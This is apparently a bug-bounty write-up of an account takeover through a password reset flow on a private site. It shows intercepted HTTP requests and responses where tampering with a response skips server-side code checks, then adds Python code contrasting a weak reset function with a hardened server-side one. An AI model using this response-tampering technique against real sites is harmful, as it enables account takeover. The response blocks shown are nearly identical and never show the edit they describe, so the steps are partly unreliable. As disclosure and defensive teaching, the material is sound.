Hi everyone, here is one of my write-ups on an account takeover via the password reset functionality. As the site is private, let's assume it is site.com.
So basically the password reset workflow is as below:
- The user requests a password reset
- Then a code (12-digit alphanumeric) is sent to the registered email id
- The user has to provide the correct code, then the application asks them to set a new password
So let's start.
To reset the password the user needs to visit site.com/forgetpassword, and the form below will appear.
So here let's say we use the victim email id victim@site.com and request a password reset.
After that the screen below will appear; here we need to enter the correct code to reset the password. The code is 12 digits, so there is no way to brute force it.
So here I used some random code like "hacker" and I saw there is no validation of the code length.
So here is the request for code validation:
```
POST /memberp/users/send_reser_instruction
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Request-With: XMLHttpRequest
Referer: site.com/forgotpassword
Cookie: bla=bla;

_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==
```
Here is the response:
```
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GMT
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
```
So after that I provided the correct code to analyse the back-end validation.
For a correct code, the response body just changed like this:
```
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GMT
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
```
So as you can see, it is just validating the prcemailid2 value, which we can get from the 1st request:
```
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR
```
So you just need to replace the response body with the code below.
The final response will look like this:
```
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GMT
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
```
Boom, now the screen below appears.
Now provide the new password and confirm the new password and submit the request; the password is changed successfully. Navigate to the login panel and log in with the new password.
Successfully owned the account.
Status: Fixed
Bounty rewarded
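The root cause in this flow is that the server let the browser decide whether the code was correct: the "set new password" step only needed the prcemailid value from the first request, so anyone who could edit the response body could reach it. Below is an added example, not the site's code, of how a reset flow should be enforced server-side in Python. The class and function names, the 15-minute expiry, the five-attempt budget and the sample account are all constructed for this example; only the 12-character alphanumeric code comes from the write-up. The `weak_set_password` function models the pattern the write-up found, beside the hardened `ResetService` that requires a server-minted token.

```python
import hashlib
import hmac
import secrets
import string
import time
from dataclasses import dataclass, field
from typing import Callable, Optional

# Constructed policy values for this example; only the 12-character code is from the write-up.
CODE_ALPHABET = string.ascii_uppercase + string.digits
CODE_LENGTH = 12
CODE_TTL_SECONDS = 15 * 60
MAX_ATTEMPTS = 5
PBKDF2_ROUNDS = 100_000


def hash_password(password: str) -> bytes:
    """Salted PBKDF2 hash; the 16-byte salt is stored in front of the digest."""
    salt = secrets.token_bytes(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def verify_password(stored: bytes, password: str) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


@dataclass
class PendingReset:
    code: str
    expires_at: float
    attempts: int = 0


@dataclass
class ResetService:
    """Hypothetical server-side reset flow: every transition is checked here,
    never inferred from what the browser rendered."""
    users: dict                                   # email -> password hash
    pending: dict = field(default_factory=dict)   # email -> PendingReset
    verified: dict = field(default_factory=dict)  # one-time token -> email
    now: Callable[[], float] = time.time          # injectable clock for tests

    def request_reset(self, email: str) -> Optional[str]:
        """Step 1: mint a fresh code for a known account. It is returned here only so the
        caller can deliver it by email; it never belongs in an HTTP response."""
        if email not in self.users:
            return None
        code = "".join(secrets.choice(CODE_ALPHABET) for _ in range(CODE_LENGTH))
        self.pending[email] = PendingReset(code, self.now() + CODE_TTL_SECONDS)
        return code

    def verify_code(self, email: str, submitted: str) -> Optional[str]:
        """Step 2: check length, expiry, attempt budget and the code itself on the server.
        Success yields a single-use token that step 3 requires."""
        state = self.pending.get(email)
        if state is None:
            return None
        if self.now() > state.expires_at or state.attempts >= MAX_ATTEMPTS:
            del self.pending[email]  # burn the code; the user must request a new one
            return None
        state.attempts += 1
        if len(submitted) != CODE_LENGTH:  # a value like "hacker" is rejected before comparison
            return None
        if not hmac.compare_digest(submitted.encode(), state.code.encode()):
            return None
        del self.pending[email]
        token = secrets.token_urlsafe(32)
        self.verified[token] = email
        return token

    def set_password(self, token: str, new_password: str) -> bool:
        """Step 3: only a token minted by verify_code can change a password; it is consumed on use."""
        email = self.verified.pop(token, None)
        if email is None:
            return False
        self.users[email] = hash_password(new_password)
        return True


def weak_set_password(svc: ResetService, email: str, new_password: str) -> bool:
    """The pattern from the write-up: the final step trusts that the client already passed
    step 2, so knowing the email identifier alone is enough to change the password."""
    if email not in svc.users:
        return False
    svc.users[email] = hash_password(new_password)
    return True


def demo() -> bool:
    """Happy path plus the two rejections that matter for this bug."""
    svc = ResetService(users={"victim@site.com": hash_password("old-password")})  # constructed account
    code = svc.request_reset("victim@site.com")
    wrong_length_rejected = svc.verify_code("victim@site.com", "hacker") is None
    forged_token_rejected = svc.set_password("made-up-token", "x") is False
    token = svc.verify_code("victim@site.com", code)
    changed = svc.set_password(token, "new-password")
    return wrong_length_rejected and forged_token_rejected and changed and verify_password(
        svc.users["victim@site.com"], "new-password"
    )
```

The important design choice is that the token in `verified` exists only because the server itself compared the code; nothing the client sends after step 1 can create it, so editing the step 2 response changes what the browser shows but not what the server will accept at step 3.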